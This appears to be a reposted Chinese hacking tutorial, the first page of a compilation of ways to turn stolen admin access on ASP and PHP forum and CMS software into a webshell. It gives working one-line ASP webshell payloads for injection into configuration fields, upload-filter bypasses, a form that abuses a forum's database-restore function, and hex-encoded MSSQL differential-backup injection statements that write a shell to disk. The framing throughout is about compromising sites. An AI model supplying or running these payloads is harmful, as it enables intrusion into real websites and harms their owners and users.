從后臺得到webshell技巧大匯總

前言
動網上傳漏洞，相信大家拿下不少肉雞吧?？梢哉f是動網讓upfile.asp上傳文件過濾不嚴的漏洞昭然天下，現在這種漏洞已經基本比較難見到了，不排除一些小網站仍然存在此漏洞。在拿站過程中，我們經常費了九牛兩虎之力拿到管理員帳號和密碼，并順利進入了后臺，雖然此時與拿到網站webshell還有一步之遙，但還是有許多新手因想不出合適的方法而被拒之門外。因此，我們把常用的從后臺得到webshell的方法進行了總結和歸納，大體情況有以下十大方面。
注意：如何進入后臺，不是本文討論范圍，其具體方法就不說了，靠大家去自己發揮。此文參考了前人的多方面的資料和信息，在此一并表示感謝。

一、直接上傳獲得webshell
這種對php和jsp的一些程序比較常見，MolyX BOARD就是其中一例，直接在心情圖標管理上傳.php類型，雖然沒有提示，其實已經成功了，上傳的文 件url應該是下，前一陣子的聯眾游戲站和網易的jsp系統漏洞就可以直接上傳jsp文件。文件名是原來的文件名，bo-blog后臺可以可以直接上傳.php文件，上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動網5.0和6.0、早期的許多整站系統)，因過濾上傳文件不嚴，導致用戶可以直接上傳webshell到網站任意可寫目錄中，從而拿到網站的管理員控制權限。

二、添加修改上傳類型
現在很多的腳本程序上傳模塊不是只允許上傳合法文件類型，而大多數的系統是允許添加上傳類型，bbsxp后臺可以添加asa|asP類型，ewebeditor的后臺也可添加asa類型,通過修改后我們可以直接上傳asa后綴的webshell了,還有一種情況是過濾了.asp，可以添加.aspasp的文件類型來上傳獲得webshell。php系統的后臺，我們可以添加.php.g1f的上傳類型，這是php的一個特性,最后的哪個只要不是已知的文件類型即可，php會將php.g1f作為.php來正常運行,從而也可成功拿到shell。LeadBbs3.14后臺獲得webshell方法是：在上傳類型中增加asp ，注意，asp后面是有個空格的，然后在前臺上傳ASP馬，當然也要在后面加個空格！

三、利用后臺管理功能寫入webshell
上傳漏洞基本上補的也差不多了,所以我們進入后臺后還可以通過修改相關文件來寫入webshell。比較的典型的有dvbbs6.0，還有leadbbs2.88等，直接在后臺修改配置文件，寫入后綴是asp的文件。而LeadBbs3.14后臺獲得webshell另一方法是：添加一個新的友情鏈接，在網站名稱處寫上冰狐最小馬即可,最小馬前后要隨便輸入一些字符，http:\\網站\inc\IncHtm\BoardLink.asp就是我們想要的shell。

四、利用后臺管理向配置文件寫webshell
利用"""":""http://"等符號構造最小馬寫入程序的配置文件，joekoe論壇，某某同學錄，沸騰展望新聞系統，COCOON Counter統計程序等等，還有很多php程序都可以，COCOON Counter統計程序舉例，在管理郵箱處添上cnhacker at 263 dot.net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker at 263 dot net\":eval request(chr(35))//"，還有一種方法就是寫上
cnhacker at 263 dot net"%><%eval request(chr(35))%><%’，這樣就會形成前后對應，最小馬也就運行了。<%eval request(chr(35))%>可以用lake2的eval發送端以及最新的2006 客戶端來連，需要說明的是數據庫插馬時候要選前者。再如動易2005，到文章中心管理-頂部菜單設置-菜單其它特效，插入一句話馬"%><%execute request("l")%><%’，保 存頂部欄目菜單參數設置成功后，我們就得到馬地址http://網站/admin/rootclass_menu_config.asp。

五、利用后臺數據庫備份及恢復獲得webshell
主要是利用后臺對aclearcase/" target="_blank" >ccess數據庫的“備份數據庫”或“恢復數據庫”功能，“備份的數據庫路徑”等變量沒有過濾導致可以把任意文件后綴改 為asp，從而得到webshell，msssql版的程序就直接應用了access版的代碼，導致sql版照樣可以利用。還可以備份網站asp文件為其他后綴 如.txt文件，從而可以查看并獲得網頁源代碼，并獲得更多的程序信息增加獲得webshell的機會。在實際運用中經常會碰到沒有上傳功能的時 候，但是有asp系統在運行，利用此方法來查看源代碼來獲得其數據庫的位置，為數據庫插馬來創造機會，動網論壇就有一個ip地址的數據庫，在后臺的ip管理中可以插入最小馬然后備份成.asp文件即可。在談談突破上傳檢測的方法，很多asp程序在即使改了后綴名后也會提示文件非法，通過在.asp文件頭加上gif89a修改后綴為gif來騙過asp程序檢測達到上傳的目的，還有一種就是用記事本打開圖片文件，隨便粘貼一部分復制到asp木馬文件頭，修改gif后綴后上傳也可以突破檢測，然后備份為.asp文件，成功得到webshell。

六、利用數據庫壓縮功能
可以將數據的防下載失效從而使插入數據庫的最小馬成功運行，比較典型的就是loveyuki的L-BLOG，在友情添加的url出寫上<%eval request (chr(35))%>, 提交后，在數據庫操作中壓縮數據庫，可以成功壓縮出.asp文件，用海洋的最小馬的eval客戶端連就得到一個webshell。

七、asp+mssql系統
這里需要提一點動網mssql版，但是可以直接本地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假圖片，然后記住其上傳路徑。寫一個本地提交的表單，代碼如下：
<form action=http://網站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post">
<p>已上傳文件的位置：<input name="Dbpath" type="text" size="80"></p>
<p>要復制到的位置：<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p> </form>
另存為.htm本地執行。把假圖片上傳路徑填在“已上傳文件的位置”那里，想要備份的WebShell的相對路徑填寫在“要復制到的位置”那里，提交就得到我們可愛的WebShell了，恢復代碼和此類似，修改相關地方就可以了。沒有遇到過后臺執行mssql命令比較強大的asp程序后臺，動網的數據庫還原和備份是個擺設，不能執行sql命令備份webshell，只能執行一些簡單的查詢命令?？梢岳胢ssql注入差異備份webshell，一般后臺是顯示了絕對路徑，只要有了注入點基本上就可以差異備份成功。下面是差異備份的主要語句代碼，利用動網7.0的注入漏洞可以用差異備份一個webshell，可以用利用上面提到的方法，將conn.asp文件備份成.txt文件而獲得庫名。
差異備份的主要代碼：
;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to --
;Drop table [heige];create table [dbo] dot [heige] ([cmd] [image])--
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--
;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to WITH DIFFERENTIAL,FORMAT--
這段代碼中，0x626273是要備份的庫名bbs的十六進制，可以是其他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六進制，是lp最小馬；0x643A5C7765625C312E617370是d:\web\1.asp的十六進制,也就是你要備份的webshell路徑。當然也可以用比較常見備份方式來獲得webshell，唯一的不足就是備份后的文件過大，如果備份數據庫中有防下載的的數據表，或者有錯誤的asp代碼，備份出來的webshell就不會成功運行，利用差異備份是成功率比較高的方法，并且極大的減少備份文件的大小。

[1]    

原文轉自：http://www.kjueaiud.com